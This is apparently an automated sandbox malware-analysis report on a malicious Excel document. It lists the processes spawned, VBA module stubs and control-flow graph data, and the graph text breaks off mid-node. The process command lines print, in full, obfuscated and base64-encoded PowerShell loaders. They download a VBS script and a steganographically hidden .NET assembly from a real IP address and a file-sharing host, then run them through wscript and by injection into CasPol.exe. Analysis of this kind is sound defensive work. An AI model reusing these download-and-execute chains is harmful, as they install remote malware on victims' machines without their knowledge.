                                                            Commandline:"C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"
                                                            Imagebase:0x13f8a0000
                                                            File size:443'392 bytes
                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:09:49:10
                                                            Start date:26/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe
                                                            Imagebase:0x13f8a0000
                                                            File size:443'392 bytes
                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:09:49:13
                                                            Start date:26/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline"
                                                            Imagebase:0x13f100000
                                                            File size:2'758'280 bytes
                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:09:49:13
                                                            Start date:26/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES59C4.tmp" "c:\Users\user\AppData\Local\Temp\cfogy1ty\CSCDB27D48C833B4E44BF14917DCA05AE4.TMP"
                                                            Imagebase:0x13f080000
                                                            File size:52'744 bytes
                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:09:49:19
                                                            Start date:26/11/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs"
                                                            Imagebase:0xffea0000
                                                            File size:168'960 bytes
                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:09:49:20
                                                            Start date:26/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                            Imagebase:0x13f8a0000
                                                            File size:443'392 bytes
                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Target ID:14
                                                            Start time:09:49:20
                                                            Start date:26/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"
                                                            Imagebase:0x13f8a0000
                                                            File size:443'392 bytes
                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:09:49:42
                                                            Start date:26/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                            Imagebase:0x1a0000
                                                            File size:107'704 bytes
                                                            MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:09:49:42
                                                            Start date:26/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                            Imagebase:0x1a0000
                                                            File size:107'704 bytes
                                                            MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:09:49:42
                                                            Start date:26/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                            Imagebase:0x1a0000
                                                            File size:107'704 bytes
                                                            MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:09:49:42
                                                            Start date:26/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                            Imagebase:0x1a0000
                                                            File size:107'704 bytes
                                                            MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:09:49:42
                                                            Start date:26/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                            Imagebase:0xffe30000
                                                            File size:107'704 bytes
                                                            MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Call Graph

                                                            • Entrypoint
                                                            • Decryption Function
                                                            • Executed
                                                            • Not Executed
                                                            • Show Help
                                                            callgraph 1 Error: Graph is empty

                                                            Module: Sheet1

                                                            Declaration
                                                            LineContent
                                                            1

                                                            Attribute VB_Name = "Sheet1"

                                                            2

                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                            3

                                                            Attribute VB_GlobalNameSpace = False

                                                            4

                                                            Attribute VB_Creatable = False

                                                            5

                                                            Attribute VB_PredeclaredId = True

                                                            6

                                                            Attribute VB_Exposed = True

                                                            7

                                                            Attribute VB_TemplateDerived = False

                                                            8

                                                            Attribute VB_Customizable = True

                                                            Module: Sheet2

                                                            Declaration
                                                            LineContent
                                                            1

                                                            Attribute VB_Name = "Sheet2"

                                                            2

                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                            3

                                                            Attribute VB_GlobalNameSpace = False

                                                            4

                                                            Attribute VB_Creatable = False

                                                            5

                                                            Attribute VB_PredeclaredId = True

                                                            6

                                                            Attribute VB_Exposed = True

                                                            7

                                                            Attribute VB_TemplateDerived = False

                                                            8

                                                            Attribute VB_Customizable = True

                                                            Module: Sheet3

                                                            Declaration
                                                            LineContent
                                                            1

                                                            Attribute VB_Name = "Sheet3"

                                                            2

                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                            3

                                                            Attribute VB_GlobalNameSpace = False

                                                            4

                                                            Attribute VB_Creatable = False

                                                            5

                                                            Attribute VB_PredeclaredId = True

                                                            6

                                                            Attribute VB_Exposed = True

                                                            7

                                                            Attribute VB_TemplateDerived = False

                                                            8

                                                            Attribute VB_Customizable = True

                                                            Module: ThisWorkbook

                                                            Declaration
                                                            LineContent
                                                            1

                                                            Attribute VB_Name = "ThisWorkbook"

                                                            2

                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                            3

                                                            Attribute VB_GlobalNameSpace = False

                                                            4

                                                            Attribute VB_Creatable = False

                                                            5

                                                            Attribute VB_PredeclaredId = True

                                                            6

                                                            Attribute VB_Exposed = True

                                                            7

                                                            Attribute VB_TemplateDerived = False

                                                            8

                                                            Attribute VB_Customizable = True

                                                            Reset < >
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000003.501986192.0000000003430000.00000010.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_3_3430000_mshta.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction ID: b8b4d010e7f49f0c4f3c791915020f337aae93df066d7dcf27fd195a8bc5e4ea
                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction Fuzzy Hash:
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000003.501986192.0000000003430000.00000010.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_3_3430000_mshta.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction ID: b8b4d010e7f49f0c4f3c791915020f337aae93df066d7dcf27fd195a8bc5e4ea
                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction Fuzzy Hash:
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000003.501986192.0000000003430000.00000010.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_3_3430000_mshta.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction ID: b8b4d010e7f49f0c4f3c791915020f337aae93df066d7dcf27fd195a8bc5e4ea
                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction Fuzzy Hash:
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000003.501986192.0000000003430000.00000010.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_3_3430000_mshta.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction ID: b8b4d010e7f49f0c4f3c791915020f337aae93df066d7dcf27fd195a8bc5e4ea
                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction Fuzzy Hash:
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000003.501986192.0000000003430000.00000010.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_3_3430000_mshta.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction ID: b8b4d010e7f49f0c4f3c791915020f337aae93df066d7dcf27fd195a8bc5e4ea
                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction Fuzzy Hash:
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000003.501986192.0000000003430000.00000010.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_3_3430000_mshta.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction ID: b8b4d010e7f49f0c4f3c791915020f337aae93df066d7dcf27fd195a8bc5e4ea
                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                              • Instruction Fuzzy Hash:

                                                              Execution Graph

                                                              Execution Coverage:4.4%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:50%
                                                              Total number of Nodes:6
                                                              Total number of Limit Nodes:0
                                                              execution_graph 2202 7fe899e4b18 2203 7fe899e5a30 URLDownloadToFileW 2202->2203 2205 7fe899e5b00 2203->2205 2198 7fe899e59e1 2199 7fe899e59f1 URLDownloadToFileW 2198->2199 2201 7fe899e5b00 2199->2201

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 149 7fe899e4b18-7fe899e5aa1 153 7fe899e5aab-7fe899e5ab1 149->153 154 7fe899e5aa3-7fe899e5aa8 149->154 155 7fe899e5abb-7fe899e5afe URLDownloadToFileW 153->155 156 7fe899e5ab3-7fe899e5ab8 153->156 154->153 157 7fe899e5b06-7fe899e5b23 155->157 158 7fe899e5b00 155->158 156->155 158->157
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.535111011.000007FE899E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7fe899e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID: DownloadFile
                                                              • String ID:
                                                              • API String ID: 1407266417-0
                                                              • Opcode ID: a99f18ceb9cc15f66c042519b2b1928d41925f347f9caf833aed70d6d470cee4
                                                              • Instruction ID: fc6e5372422a0800d4349cb122079ac24d08beccf5d1c3074ab60cadcc714010
                                                              • Opcode Fuzzy Hash: a99f18ceb9cc15f66c042519b2b1928d41925f347f9caf833aed70d6d470cee4
                                                              • Instruction Fuzzy Hash: 6E317071918A5C8FDB58DF5C98857A9B7E1FB69711F00822ED04ED3661CB70A845CB81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 7fe89ab0858-7fe89ab0889 1 7fe89ab088b-7fe89ab08f4 0->1 2 7fe89ab08f6-7fe89ab0903 0->2 1->2 3 7fe89ab0f0d-7fe89ab0f1e 2->3 4 7fe89ab0909-7fe89ab0913 2->4 12 7fe89ab0f20-7fe89ab0f23 3->12 5 7fe89ab092d-7fe89ab093f 4->5 6 7fe89ab0915-7fe89ab0923 4->6 5->3 8 7fe89ab0945-7fe89ab094f 5->8 6->5 7 7fe89ab0925-7fe89ab092b 6->7 7->5 10 7fe89ab0968-7fe89ab097a 8->10 11 7fe89ab0951-7fe89ab095e 8->11 10->3 17 7fe89ab0980-7fe89ab098a 10->17 11->10 16 7fe89ab0960-7fe89ab0966 11->16 13 7fe89ab0f2d-7fe89ab0f60 12->13 14 7fe89ab0f25-7fe89ab0f2c 12->14 13->12 18 7fe89ab0f62-7fe89ab0f96 13->18 14->13 16->10 19 7fe89ab098c-7fe89ab099a 17->19 20 7fe89ab09a4-7fe89ab09b6 17->20 22 7fe89ab0f9c-7fe89ab0fa6 18->22 23 7fe89ab1098-7fe89ab10dc 18->23 19->20 25 7fe89ab099c-7fe89ab09a2 19->25 20->3 21 7fe89ab09bc-7fe89ab09c6 20->21 26 7fe89ab09c8-7fe89ab09d5 21->26 27 7fe89ab09df-7fe89ab09f9 21->27 28 7fe89ab0fa8-7fe89ab0fb5 22->28 29 7fe89ab0fbf-7fe89ab0fee 22->29 47 7fe89ab10ed-7fe89ab1124 23->47 48 7fe89ab10de-7fe89ab10ea 23->48 25->20 26->27 30 7fe89ab09d7-7fe89ab09dd 26->30 27->3 32 7fe89ab09ff-7fe89ab0a09 27->32 28->29 31 7fe89ab0fb7-7fe89ab0fbd 28->31 29->23 53 7fe89ab0ff4-7fe89ab0ffe 29->53 30->27 31->29 35 7fe89ab0a0b-7fe89ab0a18 32->35 36 7fe89ab0a22-7fe89ab0a39 32->36 35->36 41 7fe89ab0a1a-7fe89ab0a20 35->41 36->3 42 7fe89ab0a3f-7fe89ab0a49 36->42 41->36 45 7fe89ab0a4b-7fe89ab0a58 42->45 46 7fe89ab0a65-7fe89ab0a79 42->46 45->46 54 7fe89ab0a5a-7fe89ab0a63 45->54 46->3 51 7fe89ab0a7f-7fe89ab0a89 46->51 49 7fe89ab112a-7fe89ab1190 47->49 50 7fe89ab11c1-7fe89ab11cb 47->50 48->47 89 7fe89ab119a-7fe89ab119e 49->89 57 7fe89ab11cd-7fe89ab11d7 50->57 58 7fe89ab11d8-7fe89ab11e8 50->58 55 7fe89ab0a8b-7fe89ab0a98 51->55 56 7fe89ab0aa8-7fe89ab0abc 51->56 59 7fe89ab1017-7fe89ab1077 53->59 60 7fe89ab1000-7fe89ab100d 53->60 54->46 55->56 64 7fe89ab0a9a-7fe89ab0aa6 55->64 56->3 65 7fe89ab0ac2-7fe89ab0acc 56->65 61 7fe89ab11ea-7fe89ab11ee 58->61 62 7fe89ab11f5-7fe89ab121a 58->62 83 7fe89ab108b-7fe89ab1097 59->83 84 7fe89ab1079-7fe89ab1084 59->84 60->59 67 7fe89ab100f-7fe89ab1015 60->67 61->62 64->56 69 7fe89ab0aee-7fe89ab0b02 65->69 70 7fe89ab0ace-7fe89ab0adb 65->70 67->59 69->3 76 7fe89ab0b08-7fe89ab0b12 69->76 70->69 75 7fe89ab0add-7fe89ab0aec 70->75 75->69 78 7fe89ab0b34-7fe89ab0b48 76->78 79 7fe89ab0b14-7fe89ab0b21 76->79 78->3 82 7fe89ab0b4e-7fe89ab0b59 78->82 79->78 80 7fe89ab0b23-7fe89ab0b32 79->80 80->78 86 7fe89ab0b5b-7fe89ab0b88 82->86 87 7fe89ab0ba0-7fe89ab0bb1 82->87 84->83 86->87 90 7fe89ab0b8a-7fe89ab0b9e 86->90 87->3 91 7fe89ab0bb7-7fe89ab0bc1 87->91 94 7fe89ab11a6-7fe89ab11be 89->94 90->87 92 7fe89ab0bc3-7fe89ab0bf0 91->92 93 7fe89ab0c05-7fe89ab0c4f 91->93 92->93 96 7fe89ab0bf2-7fe89ab0c03 92->96 93->3 100 7fe89ab0c55-7fe89ab0c5f 93->100 96->93 101 7fe89ab0c7b-7fe89ab0cdd 100->101 102 7fe89ab0c61-7fe89ab0c71 100->102 101->3 107 7fe89ab0ce3-7fe89ab0ced 101->107 102->101 103 7fe89ab0c73-7fe89ab0c74 102->103 103->101 108 7fe89ab0d09-7fe89ab0d4a 107->108 109 7fe89ab0cef-7fe89ab0cff 107->109 108->3 113 7fe89ab0d50-7fe89ab0d5a 108->113 109->108 110 7fe89ab0d01-7fe89ab0d02 109->110 110->108 114 7fe89ab0d5c-7fe89ab0d6c 113->114 115 7fe89ab0d76-7fe89ab0dda 113->115 114->115 116 7fe89ab0d6e-7fe89ab0d6f 114->116 115->3 120 